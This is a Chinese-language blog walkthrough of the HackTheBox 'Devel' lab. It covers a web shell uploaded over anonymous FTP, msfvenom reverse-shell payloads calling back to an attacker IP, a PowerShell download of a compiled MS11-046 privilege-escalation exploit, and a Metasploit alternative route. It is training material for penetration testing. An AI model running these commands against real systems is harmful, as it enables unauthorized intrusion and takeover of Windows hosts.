靶机 HackTheBox

发布日期: 2023-07-31

更新日期: 2023-11-08

文章字数: 709 字

阅读时长: 3 分

阅读次数: 次

HTB-Devel

一、思路概要

1.端口扫描发现存在可匿名登录的FTP服务，主页响应包发现是ASP.NET语言；

2.msfvenom制作aspx木马反弹shell；

3.systeminfo发现windows 7 build 7600没打补丁；

4.MS11-046提权。

二、信息收集

nmap端口扫描

开放端口：21（ftp）、80（http），其中ftp允许匿名登录

浏览器访问靶机IP，主页如下，访问iisstart.htm页面一样

Burp抓包可看到响应包中X-Powered-By字段值，说明网站使用ASP.NET语言，可以尝试ftp传一个aspx的木马

在本地kali查找aspx木马，此处选择用seclists的（seclists是github的一个开源字典项目）

如下命令复制到当前目录

cp /usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx ./

匿名连接FTP服务并上传aspx木马

查看，木马被传到网站根目录

访问木马，执行命令成功，接下来用msfvenom生成aspx木马反弹shell

三、msfvenom制作aspx木马反弹shell

可用如下命令查看支持的格式和payload

msfvenom --list formats
msfvenom --list payloads | grep 'shell_reverse_tcp'

制作反弹shell木马

msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.5 LPORT=9898 -o reverse-shell.aspx

用FTP上传

ftp> put reverse-shell.aspx

本地kali开启nc监听nc -lvnp 9898

浏览器访问：http://10.10.10.5/reverse-shell.aspx，成功获取shell

执行systeminfo命令查看主机信息，Win7 Build 7600没打补丁

google搜索关键字：microsoft windows 7 build 7600 exploit

https://www.exploit-db.com/exploits/40564

EDB-ID是40564

四、MS11-046提权

本地kali执行如下命令更新exploit数据库并查找EDB-ID为40564的exploit

searchsploit -u
searchsploit -m 40564

apt下载mingw-w64

apt update
apt install mingw-w64

编译40564.c

i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

本地kali开启http服务

python3 -m http.server 80

靶机执行如下命令，下载编译好的40564.exe（执行命令后，稍等一分钟按一下回车）

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.5:80/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"

可看到40564.exe已被下载到靶机

执行40564.exe，成功提权，Over！

flag位置
c:\Users\babis\Desktop\user.txt
c:\Users\Administrator\Desktop\root.txt

参考

https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/windows-boxes/devel-writeup-w-o-metasploit

https://0xdf.gitlab.io/2019/03/05/htb-devel.html

另一种以MSF为主的getshell、提权思路

本地kali制作aspx木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=9899 -f aspx -o met_rev_9899.aspx

ftp上传木马

ftp> put met_rev_9899.aspx

启动MSF执行如下命令进行监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost tun0
set lport 9899
run

新开一个终端执行如下命令访问aspx木马

curl http://10.10.10.5/met_rev_9899.aspx

可看到成功getshell

把shell会话（此处为session 1）放到后台，并查看可利用的exploit

background
use post/multi/recon/local_exploit_suggester
set session 1
run

用ms10-015模块提权

use exploit/windows/local/ms10_015_kitrap0d
set lhost tun0
set lport 9900
set session 1
run

wa0er

https://wa0er.github.io/posts/97f065fe.html

本博客所有文章除特別声明外，均采用 CC BY-NC 4.0 许可协议。转载请注明来源 wa0er !

匿名FTP ASP.NET msfvenom aspx木马 MS11-046提权

LineCTF2022-gotm

2023-08-01 CTF

JWT伪造 go代码审计 SSTI模板注入

HTB-Cerberus

HackTheBox-Cerberus

2023-07-24 靶机 HackTheBox

icinga服务 CVE-2022-24716（目录遍历） CVE-2022-24715（RCE） CVE-2022-31214（Firejail本地提权） winrm chisel代理 MSF提权 ManageEngine ADSelfService Plus服务

HTB-Devel

HTB-Devel

一、思路概要

二、信息收集

三、msfvenom制作aspx木马反弹shell

四、MS11-046提权

参考

另一种以MSF为主的getshell、提权思路

祝客官顺风顺水顺财神